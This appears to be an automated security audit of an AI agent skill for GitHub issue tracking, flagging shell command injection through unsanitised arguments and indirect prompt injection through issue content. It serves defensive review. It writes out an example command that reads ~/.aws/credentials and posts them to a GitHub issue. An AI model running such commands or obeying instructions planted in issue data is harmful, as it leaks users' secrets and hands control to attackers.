issue-progress-tracking

Fail

Audited by Gen Agent Trust Hub on Mar 26, 2026

Risk Level: HIGH
Categories: COMMAND_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill directly interpolates user-provided input from $ARGUMENTS[0] into shell commands in SKILL.md and rules/start-work-ceremony.md. Examples include gh issue edit $ARGUMENTS[0], gh issue comment $ARGUMENTS[0], and git checkout -b issue/$ARGUMENTS[0]-.... If the input contains shell metacharacters (e.g., ;, &&, |), the shell interprets them, which allows arbitrary command execution within the agent's environment.
  • [DATA_EXFILTRATION]: The command injection vulnerability can be leveraged to exfiltrate sensitive data. An attacker could provide a malicious argument that executes a command like gh issue comment 123 --body "$(cat ~/.aws/credentials)", sending local secrets to an external GitHub issue.
  • [PROMPT_INJECTION]: The skill exhibits a vulnerability surface for indirect prompt injection (Category 8).
      • Ingestion points: Untrusted data enters the agent context through the output of gh CLI commands when reading issue status or comments as part of the ceremony instructions in SKILL.md.
      • Boundary markers: No delimiters or instructions are used to distinguish between legitimate issue data and potentially malicious embedded instructions.
      • Capability inventory: The skill has access to the Bash tool, enabling it to execute git commands, modify files, and interact with the GitHub API.
      • Sanitization: There is no validation or escaping of the data retrieved from GitHub before it is processed or acted upon by the agent.
Recommendations
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Mar 26, 2026, 10:47 AM